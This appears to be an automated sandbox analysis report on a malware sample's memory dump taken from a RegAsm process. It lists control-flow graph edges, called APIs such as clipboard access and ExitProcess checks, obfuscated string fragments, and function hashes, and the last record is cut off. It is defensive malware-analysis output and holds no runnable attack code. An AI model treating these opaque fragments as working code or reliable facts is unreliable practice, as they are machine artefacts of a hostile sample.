                                                                  Execution Coverage:1.2%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:71.9%
                                                                  Total number of Nodes:57
                                                                  Total number of Limit Nodes:14
                                                                  execution_graph 20070 40d2c0 20071 40d2c9 20070->20071 20072 40d2d1 GetInputState 20071->20072 20073 40d4ae ExitProcess 20071->20073 20074 40d2de 20072->20074 20075 40d2e6 GetCurrentThreadId GetCurrentProcessId 20074->20075 20076 40d4a9 20074->20076 20078 40d311 20075->20078 20089 446f80 FreeLibrary 20076->20089 20084 40ed90 20078->20084 20080 40d49b 20080->20076 20088 412290 CoInitialize 20080->20088 20086 40edc4 20084->20086 20085 40ee76 LoadLibraryExW 20087 40ee8b 20085->20087 20086->20085 20087->20080 20089->20073 20090 410480 20093 4106dd 20090->20093 20091 410aa3 20093->20091 20094 446fa0 RtlAllocateHeap 20093->20094 20094->20093 20095 447600 20096 447624 20095->20096 20097 44797e 20096->20097 20099 4479ab 20096->20099 20100 447a4e 20096->20100 20103 447560 LdrInitializeThunk 20096->20103 20097->20099 20097->20100 20104 447560 LdrInitializeThunk 20097->20104 20100->20099 20101 447560 LdrInitializeThunk 20100->20101 20101->20100 20103->20097 20104->20100 20105 444200 20106 444246 RtlAllocateHeap 20105->20106 20107 44421a 20105->20107 20107->20106 20108 44a7e0 20110 44a7f0 20108->20110 20109 44a93e 20110->20109 20112 447560 LdrInitializeThunk 20110->20112 20112->20109 20113 444282 20114 444302 RtlFreeHeap 20113->20114 20115 444308 20113->20115 20116 444290 20113->20116 20114->20115 20116->20114 20117 447ede 20118 447bb0 20117->20118 20122 447d03 20117->20122 20119 447cf3 20118->20119 20123 447560 LdrInitializeThunk 20118->20123 20121 447c71 20123->20121 20124 40febc 20126 40fec8 20124->20126 20127 40fed9 20124->20127 20127->20126 20130 41044e 20127->20130 20131 446fa0 RtlAllocateHeap 20127->20131 20128 410aa3 20130->20128 20130->20130 20132 446fa0 RtlAllocateHeap 20130->20132 20131->20127 20132->20130 20133 40effc 20139 40f7e0 RtlAllocateHeap 20133->20139 20135 40f0b0 20136 40f430 20135->20136 20140 40f7e0 RtlAllocateHeap 20135->20140 20138 40eeb0 20138->20133 20138->20135 20139->20138 
20140->20135

                                                                  Control-flow Graph

                                                                  control_flow_graph 0 410480-4106db 1 41070d-410733 0->1 2 4106dd-4106df 0->2 7 4108f1-410958 1->7 8 410760-410790 1->8 9 4108c5-4108c9 1->9 10 410a04-410a18 1->10 11 4107f6-410818 1->11 12 41073a-410743 1->12 13 4107ed-4107f1 1->13 14 4108ce-4108ea 1->14 3 4106e0-41070b call 411bb0 2->3 3->1 34 41098b-410993 7->34 35 41095a 7->35 39 410792 8->39 40 4107cb-4107e6 8->40 15 410b52 9->15 50 410a1f-410a28 10->50 37 41084b-41087b 11->37 38 41081a 11->38 12->8 36 410b5c-410b7b 13->36 14->7 14->10 16 410ac0-410ad1 14->16 17 410b20 14->17 18 410b40 14->18 19 410aa3 14->19 20 410b25-410b2c 14->20 21 410a86-410a9c call 446fa0 14->21 22 410b86-410b8d 14->22 23 410b4b 14->23 24 410a4a-410a65 14->24 25 410a2f-410a31 14->25 26 410ab0-410ab8 14->26 27 410b10 14->27 28 410b33 14->28 29 410b12 14->29 30 410af6-410b07 14->30 31 410b19 14->31 32 410b39-410b3f 14->32 33 410ad8-410af0 14->33 15->36 16->33 17->20 18->23 19->26 20->18 20->23 20->28 20->32 21->16 21->17 21->18 21->19 21->20 21->22 21->23 21->26 21->27 21->28 21->29 21->30 21->31 21->32 21->33 43 410b94 22->43 44 410b96-410ba5 22->44 23->15 62 410a6c-410a7f 24->62 61 410a38-410a43 25->61 26->27 29->31 30->27 31->17 32->18 33->30 48 4109b1-4109c0 34->48 49 410995-41099f 34->49 47 410960-410989 call 411da0 35->47 36->7 36->9 36->10 36->11 36->13 36->14 36->16 36->17 36->18 36->19 36->20 36->21 36->22 36->23 36->24 36->25 36->26 36->27 36->28 36->29 36->30 36->31 36->32 36->33 45 4108a6-4108be 37->45 46 41087d-41087f 37->46 42 410820-410849 call 411d20 38->42 41 4107a0-4107c9 call 411c20 39->41 40->7 40->9 40->10 40->11 40->13 40->14 40->16 40->17 40->18 40->19 40->20 40->21 40->22 40->23 40->24 40->25 40->26 40->27 40->28 40->29 40->30 40->31 40->32 40->33 41->40 42->37 43->44 45->7 45->9 45->10 45->14 45->16 45->17 45->18 45->19 45->20 45->21 45->22 45->23 45->24 45->25 45->26 45->27 45->28 45->29 45->30 45->31 45->32 45->33 63 410880-4108a4 call 411ca0 46->63 
47->34 55 4109c2-4109c4 48->55 56 4109e5-4109fd 48->56 54 4109a0-4109af 49->54 50->16 50->17 50->18 50->19 50->20 50->21 50->22 50->23 50->24 50->25 50->26 50->27 50->28 50->29 50->30 50->31 50->32 50->33 54->48 54->54 70 4109d0-4109e1 55->70 56->10 61->16 61->17 61->18 61->19 61->20 61->21 61->22 61->23 61->24 61->26 61->27 61->28 61->29 61->30 61->31 61->32 61->33 62->16 62->17 62->18 62->19 62->20 62->21 62->22 62->23 62->26 62->27 62->28 62->29 62->30 62->31 62->32 62->33 63->45 70->70 71 4109e3 70->71 71->56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (Y6[$.AtC$89$9]_$9lji$D!M#$Gq\s$Gu@w$PQ$S%U'$XyR{$Ym]o$hI2K$k=W?$pE}G$w%r'$yQrS$zMzO$us$f
                                                                  • API String ID: 0-1367088923
                                                                  • Opcode ID: bd0f71112ca25ec8b8a9f2482f83a574c3380875e503502dc80236c562b04332
                                                                  • Instruction ID: a09763c792eff68ee2d066390d92369163d89c9f7aba8ef65be1ebf7ec03b0a0
                                                                  • Opcode Fuzzy Hash: bd0f71112ca25ec8b8a9f2482f83a574c3380875e503502dc80236c562b04332
                                                                  • Instruction Fuzzy Hash: A30266B4108380EFD3609F65E880B5BBBE4FB86745F40492DF5C99B262D774D884CB5A

                                                                  Control-flow Graph

                                                                  control_flow_graph 74 40febc-40fec1 75 40fed0 74->75 76 410121-4101d3 call 40ca20 74->76 77 40fed2-40fed4 74->77 78 40fec8-40fecf 74->78 79 40fed9-4100ca 74->79 80 410118-41011c 74->80 75->77 81 410426-410432 76->81 90 410340 76->90 91 410349-41034f 76->91 92 4103c8-4103f5 76->92 93 41044e 76->93 94 410211-410218 76->94 95 410350-410358 76->95 96 410455-41045c 76->96 97 4101da 76->97 98 41021a-410234 76->98 99 4101e0 76->99 100 410360-410365 76->100 101 410420 76->101 102 410323-410339 76->102 103 4102e7-4102ee 76->103 104 4103a6-4103c1 call 446fa0 76->104 105 41036c-41036f 76->105 106 4101f0 76->106 107 410376-410380 76->107 108 4101f9-41020a 76->108 109 4102fb-41031c 76->109 110 41043d-41044c 76->110 111 4103fc-41040b 76->111 83 410435-41043c 77->83 78->75 84 4100fc-410104 79->84 85 4100cc-4100cf 79->85 80->81 81->83 88 410107-410111 84->88 87 4100d0-4100fa call 412110 85->87 87->84 88->76 88->80 88->81 88->90 88->91 88->92 88->93 88->94 88->95 88->96 88->97 88->98 88->99 88->100 88->101 88->102 88->103 88->104 88->105 88->106 88->107 88->108 88->109 88->110 88->111 90->91 91->95 92->81 92->93 92->96 92->101 92->105 92->107 92->110 92->111 114 41073a-410743 92->114 130 410760-410790 92->130 93->96 115 41026f-410296 94->115 95->100 96->114 116 410236 98->116 117 41026a-41026c 98->117 99->106 100->81 100->93 100->96 100->101 100->105 100->107 100->110 100->111 100->114 102->81 102->90 102->91 102->92 102->93 102->95 102->96 102->100 102->101 102->104 102->105 102->107 102->110 102->111 103->109 104->81 104->92 104->93 104->96 104->100 104->101 104->105 104->107 104->110 104->111 104->114 104->130 105->81 105->93 105->96 105->101 105->107 105->110 105->114 106->108 122 410388-41039f 107->122 108->81 108->90 108->91 108->92 108->93 108->94 108->95 108->96 108->98 108->100 108->101 108->102 108->103 108->104 108->105 108->107 108->109 108->110 108->111 109->81 109->90 109->91 109->92 109->93 109->95 
109->96 109->100 109->101 109->102 109->104 109->105 109->107 109->110 109->111 110->81 111->101 114->130 126 410298 115->126 127 4102ca-4102d5 115->127 123 410240-410268 call 412210 116->123 117->115 122->81 122->92 122->93 122->96 122->100 122->101 122->104 122->105 122->107 122->110 122->111 122->114 122->130 123->117 132 4102a0-4102c8 call 412190 126->132 137 4102d9-4102e0 127->137 133 410792 130->133 134 4107cb-4107e6 130->134 132->127 138 4107a0-4107c9 call 411c20 133->138 143 410ac0-410ad1 134->143 144 410b20 134->144 145 410b40 134->145 146 410aa3 134->146 147 4108c5-4108c9 134->147 148 410b25-410b2c 134->148 149 410a04-410a18 134->149 150 410a86-410a9c call 446fa0 134->150 151 410b86-410b8d 134->151 152 410b4b 134->152 153 410a4a-410a65 134->153 154 4107ed-4107f1 134->154 155 410a2f-410a31 134->155 156 4108ce-4108ea 134->156 157 4108f1-410958 134->157 158 410ab0-410ab8 134->158 159 410b10 134->159 160 410b33 134->160 161 410b12 134->161 162 4107f6-410818 134->162 163 410af6-410b07 134->163 164 410b19 134->164 165 410b39-410b3f 134->165 166 410ad8-410af0 134->166 137->81 137->90 137->91 137->92 137->93 137->95 137->96 137->100 137->101 137->102 137->103 137->104 137->105 137->107 137->109 137->110 137->111 138->134 143->166 144->148 145->152 146->158 172 410b52 147->172 148->145 148->152 148->160 148->165 180 410a1f-410a28 149->180 150->143 150->144 150->145 150->146 150->148 150->151 150->152 150->158 150->159 150->160 150->161 150->163 150->164 150->165 150->166 170 410b94 151->170 171 410b96-410ba5 151->171 152->172 185 410a6c-410a7f 153->185 167 410b5c-410b7b 154->167 182 410a38-410a43 155->182 156->143 156->144 156->145 156->146 156->148 156->149 156->150 156->151 156->152 156->153 156->155 156->157 156->158 156->159 156->160 156->161 156->163 156->164 156->165 156->166 173 41098b-410993 157->173 174 41095a 157->174 158->159 161->164 168 41084b-41087b 162->168 169 41081a 162->169 163->159 164->144 165->145 166->163 167->143 167->144 167->145 167->146 
167->147 167->148 167->149 167->150 167->151 167->152 167->153 167->154 167->155 167->156 167->157 167->158 167->159 167->160 167->161 167->162 167->163 167->164 167->165 167->166 183 4108a6-4108be 168->183 184 41087d-41087f 168->184 181 410820-410849 call 411d20 169->181 170->171 172->167 178 4109b1-4109c0 173->178 179 410995-41099f 173->179 177 410960-410989 call 411da0 174->177 177->173 192 4109c2-4109c4 178->192 193 4109e5-4109fd 178->193 191 4109a0-4109af 179->191 180->143 180->144 180->145 180->146 180->148 180->150 180->151 180->152 180->153 180->155 180->158 180->159 180->160 180->161 180->163 180->164 180->165 180->166 181->168 182->143 182->144 182->145 182->146 182->148 182->150 182->151 182->152 182->153 182->158 182->159 182->160 182->161 182->163 182->164 182->165 182->166 183->143 183->144 183->145 183->146 183->147 183->148 183->149 183->150 183->151 183->152 183->153 183->155 183->156 183->157 183->158 183->159 183->160 183->161 183->163 183->164 183->165 183->166 189 410880-4108a4 call 411ca0 184->189 185->143 185->144 185->145 185->146 185->148 185->150 185->151 185->152 185->158 185->159 185->160 185->161 185->163 185->164 185->165 185->166 189->183 191->178 191->191 195 4109d0-4109e1 192->195 193->149 195->195 200 4109e3 195->200 200->193
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 13$58$89$8<$9lji$I1$PQ$w%r'$us$f
                                                                  • API String ID: 0-2782953580
                                                                  • Opcode ID: 9b76d46fa66223bdcbb40c86f8213a292735e728758ff7986478ce89d37e3186
                                                                  • Instruction ID: d3e6123da5a87937c4ce527ea16b001d947dd1f89a44154d0df95b1e97982e4a
                                                                  • Opcode Fuzzy Hash: 9b76d46fa66223bdcbb40c86f8213a292735e728758ff7986478ce89d37e3186
                                                                  • Instruction Fuzzy Hash: CB4289B4104740DFD324CF25E884B1ABBB5FF8A305F54896DE48A8B2A2D735E846CF55

                                                                  Control-flow Graph: function at 0040d2c0 (graph edge list omitted; calls GetInputState, GetCurrentThreadId, GetCurrentProcessId, ExitProcess)
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcess$ExitInputStateThread
                                                                  • String ID: 'GFA$edgf
                                                                  • API String ID: 1029096631-957644222
                                                                  • Opcode ID: 502ce430d97d9e37560fd800a07c2546b427697bcdc0870340be3cc5bdd76706
                                                                  • Instruction ID: 7ad23a135721fdd6d89255751fe31a0f6133d9381a8379ca88b8a81bac4427f5
                                                                  • Opcode Fuzzy Hash: 502ce430d97d9e37560fd800a07c2546b427697bcdc0870340be3cc5bdd76706
                                                                  • Instruction Fuzzy Hash: 7C414C7480D2809BC301BF99D544A1EFBE5AF52709F148D2DE5C4A73A2C73AD858CB6B

                                                                  Control-flow Graph: function at 00447600 (graph edge list omitted)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %sgh$2wD$4`[b$B{D$EBC
                                                                  • API String ID: 0-496620645
                                                                  • Opcode ID: 865e8d7a960f62aafbc96611e0bb75791c5df7bc6a7c9e46bf01ca827213b2f7
                                                                  • Instruction ID: 69e25fd42919f09a0fad1ce1aae30dbab7648f036e3687e99ce2e3a807c76338
                                                                  • Opcode Fuzzy Hash: 865e8d7a960f62aafbc96611e0bb75791c5df7bc6a7c9e46bf01ca827213b2f7
                                                                  • Instruction Fuzzy Hash: 782290B4D04206DFEB10DF94D8516BFBBB1FF0A315F140869E941AB352D3399852CBA8

                                                                  Control-flow Graph: function at 0040effc (graph edge list omitted)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %!-0$:g;1$GA$j$yE
                                                                  • API String ID: 0-657862259
                                                                  • Opcode ID: 8daadd4c4eafb44f063823af2852c0169c47290188a28889f776968e4671cce3
                                                                  • Instruction ID: 0bf61b085e90676ab9422539f66e4567ca3ca80a6a34bc9c966370a20edcd352
                                                                  • Opcode Fuzzy Hash: 8daadd4c4eafb44f063823af2852c0169c47290188a28889f776968e4671cce3
                                                                  • Instruction Fuzzy Hash: BD02CE74108381CFD321DF14D4806ABB7E1BF9A309F044A3DE8C99B392E3799959CB5A

                                                                  Control-flow Graph: function at 00447560 (single basic block 447560-447592, calls LdrInitializeThunk; graph omitted)
                                                                  APIs
                                                                  • LdrInitializeThunk.NTDLL(00444FF1,00000001,00000005,?,00000000,?,?,004214D5), ref: 0044758E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: 7654$7654
                                                                  • API String ID: 2994545307-1888865020
                                                                  • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                  • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                  • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                  • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                  Control-flow Graph: function at 0044a7e0 (graph edge list omitted)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: @$MNOP
                                                                  • API String ID: 2994545307-2234187807
                                                                  • Opcode ID: 383395a8c2557685db5440b8f2875ef8fac23426ad172215021297f230a7d1c8
                                                                  • Instruction ID: 80857ea081e9c0ef4e0b68a0f371812cde995d369360003f316b1ac55e0fae6d
                                                                  • Opcode Fuzzy Hash: 383395a8c2557685db5440b8f2875ef8fac23426ad172215021297f230a7d1c8
                                                                  • Instruction Fuzzy Hash: E441DEB15083009FE710DF58D885A2BBBE5FF85318F09892EE485CB2A2E379C914CB57

                                                                  Control-flow Graph: function at 0040ed90 (graph edge list omitted; calls LoadLibraryExW)
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(E31BE117,00000000,191A131C), ref: 0040EE7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: b255b2b3df52fa8fefe507985d2cf18ad8c452aef6b15d87a3589c64d6e5f074
                                                                  • Instruction ID: 63d71ec5668dfa77f13543280154113270aaac174107f28ab34eb916c867471b
                                                                  • Opcode Fuzzy Hash: b255b2b3df52fa8fefe507985d2cf18ad8c452aef6b15d87a3589c64d6e5f074
                                                                  • Instruction Fuzzy Hash: 6C215A7410C3849BD311AF15D844A5FBBE5FB9A709F440E2EF1C8A7292C339D9148B6B

                                                                  Control-flow Graph: function at 00444282 (graph edge list omitted; calls RtlFreeHeap)
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(?,00000000), ref: 00444306
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 9b64c73a6e1149bfdb640a00ee75ce205078f54ff32e19d42aa46313119ccf0f
                                                                  • Instruction ID: 6bffe2fc0ddf8828133d19de1647fbd8cb8d601340a533239dc1377920776a1d
                                                                  • Opcode Fuzzy Hash: 9b64c73a6e1149bfdb640a00ee75ce205078f54ff32e19d42aa46313119ccf0f
                                                                  • Instruction Fuzzy Hash: 52012874608740AFD301EB59E8A0A2ABBE5AB8A701F14481CE4C487362C339DC50CB9A

                                                                  Control-flow Graph: function at 00444200 (graph edge list omitted; calls RtlAllocateHeap)
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00444257
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 80a4013d8c0c1a4728d3e3860e27985b7f180d0faad403a50f6dae2b7d497ec6
                                                                  • Instruction ID: 3ae5f2f3d576169419d8a9ac17d01dbf57a201fe257bde1ca6e5dd96a0ad9e98
                                                                  • Opcode Fuzzy Hash: 80a4013d8c0c1a4728d3e3860e27985b7f180d0faad403a50f6dae2b7d497ec6
                                                                  • Instruction Fuzzy Hash: FAF0177410C2409BE601EB58E941A1EFBE5EB95701F44486DF9C487252D239E824DB67
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: drC$#JC$.L6j$>Wv$KJIg$vRTb$~PF<
                                                                  • API String ID: 0-3854151749
                                                                  • Opcode ID: b49086e5311dadaa935c078b0d22b8ac093333b5ead3b543180416bfd8a0cf4b
                                                                  • Instruction ID: 80dd1b3f92e3bf53a7d47459d3dbaa13194b9cb319ea6a1a27847e4a333d22a3
                                                                  • Opcode Fuzzy Hash: b49086e5311dadaa935c078b0d22b8ac093333b5ead3b543180416bfd8a0cf4b
                                                                  • Instruction Fuzzy Hash: 9BD27270405B808BE7318F35C490BA3BBE1AF1B306F58599ED4EB8B382D779A505CB65
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                  • String ID: 3$?$e
                                                                  • API String ID: 2832541153-3975470078
                                                                  • Opcode ID: 9da8b1234222b0aafb8b3fc8940d2f88cb45ae5217a432052fd4da87163de2ca
                                                                  • Instruction ID: a9f521efd2a2c46b063ecbce395cbb1927191a562d08ac0c9302c0b51827cb25
                                                                  • Opcode Fuzzy Hash: 9da8b1234222b0aafb8b3fc8940d2f88cb45ae5217a432052fd4da87163de2ca
                                                                  • Instruction Fuzzy Hash: 0441A37540C3818ED311EF3CD48832FBFE09B96314F154A2EE4D996392C678894ACB67
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: String$Free$Variant$ClearInit
                                                                  • String ID: 4`[b$7654
                                                                  • API String ID: 4205145696-3675246634
                                                                  • Opcode ID: 9da582bd222a9aa3210a227d15e33794fc036b98df7b843830be9b90ece2603a
                                                                  • Instruction ID: c15c9a77a36a85870a6c8e83f66fe4480b167010d9fbe339181f0a578d0a5d72
                                                                  • Opcode Fuzzy Hash: 9da582bd222a9aa3210a227d15e33794fc036b98df7b843830be9b90ece2603a
                                                                  • Instruction Fuzzy Hash: 6BE1EE75A08301DFEB00CF68E881B6EBBB1FB8930AF14482DE985D7291D739D915CB59
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: AllocString
                                                                  • String ID: ,/$4`[b$7654
                                                                  • API String ID: 2525500382-138038313
                                                                  • Opcode ID: 011e93b997d46e8870ce040462fe3f6284c17b45014897ad250b99d8540a381f
                                                                  • Instruction ID: 5c24870ec86159d0f6ecf84723dde93076e3ef2f57b7b7e0ddad74c94e93c31d
                                                                  • Opcode Fuzzy Hash: 011e93b997d46e8870ce040462fe3f6284c17b45014897ad250b99d8540a381f
                                                                  • Instruction Fuzzy Hash: F1E1D075A08301AFEB10CF64DC41B6EBBB1FB89305F14482DF685AB291D739D911CB5A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff
                                                                  • API String ID: 0-2771814109
                                                                  • Opcode ID: 60d91501b71ca20af355275aac5581bd6b324532a87e7822ac95ca22a7305489
                                                                  • Instruction ID: ddca72acc18f96ceca311f167404972c65106f1bd8c402654e553bdb633caa3b
                                                                  • Opcode Fuzzy Hash: 60d91501b71ca20af355275aac5581bd6b324532a87e7822ac95ca22a7305489
                                                                  • Instruction Fuzzy Hash: CCD2E3716083418FC714CE29C59436BBBE2ABC9314F18867EE899AB3D1D778DD05CB86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: -17E$7654$7654$=I# $?8N$QQ;%$r~B$E'I
                                                                  • API String ID: 0-3386696674
                                                                  • Opcode ID: 37c194b4809dd1c00137d7dc201101eebe92735c8c0e734b709c7d09f5c8d5e3
                                                                  • Instruction ID: 60540d3078bd233bb59da47371b54fb6625578c4cae607adf808edf17fed4755
                                                                  • Opcode Fuzzy Hash: 37c194b4809dd1c00137d7dc201101eebe92735c8c0e734b709c7d09f5c8d5e3
                                                                  • Instruction Fuzzy Hash: 1442CB71608311DFD714DF28E880A2AB7E2FF89715F49896DE8858B392D739EC01CB56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 3_]$4`[b$4`[b$7654$8C-A$;[6Y$Vwvu${/}-
                                                                  • API String ID: 0-2602927754
                                                                  • Opcode ID: 307ad71cdb71838ec795c4dd14610299abfbd5c82a6174d8d007dc7da4c3e356
                                                                  • Instruction ID: ba1e9d66d155ef7e9119e1be78dddf6f3c512da5b59593db3145263a403de92d
                                                                  • Opcode Fuzzy Hash: 307ad71cdb71838ec795c4dd14610299abfbd5c82a6174d8d007dc7da4c3e356
                                                                  • Instruction Fuzzy Hash: C012ABB4600700DFC7248F25C891BA3B7F2FF46305F14885DE99A8B692D379E891CB99
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0$0$0$@$i$u
                                                                  • API String ID: 0-2200626124
                                                                  • Opcode ID: ab89587f8a0daafa244c590f772caad168a2f81082220ddc44e8abb7ed779df5
                                                                  • Instruction ID: 0f02e483ae5546116cb6baed28d9e077716f17be131def69be1fd2f2fc950076
                                                                  • Opcode Fuzzy Hash: ab89587f8a0daafa244c590f772caad168a2f81082220ddc44e8abb7ed779df5
                                                                  • Instruction Fuzzy Hash: 1472F571A0C3428BD318CE28C58471BBBE1ABC5314F148A2EE8D9A73D1D7B8DD45CB86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b$7654$HK$cb`d$gzyi$vrhz
                                                                  • API String ID: 0-2685429167
                                                                  • Opcode ID: 424902dc72ab28ec9b7c09e577cb145ec8479a31a11f362cc29c796f7d8e5cc8
                                                                  • Instruction ID: 3f5d2fb8fb5b53038c321c487b2321c0e33df35c546daf2f5165b83ef3f83226
                                                                  • Opcode Fuzzy Hash: 424902dc72ab28ec9b7c09e577cb145ec8479a31a11f362cc29c796f7d8e5cc8
                                                                  • Instruction Fuzzy Hash: 3A42DCB1608350DFD7009F25E89162FBBE1EF8A349F54492EE4C597352D338D910CB5A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ^G$`c$[Z]$su$wy
                                                                  • API String ID: 0-2730888924
                                                                  • Opcode ID: f07032dc12982def7a5bf2984774998718f875f43970d5821979900336bb7d63
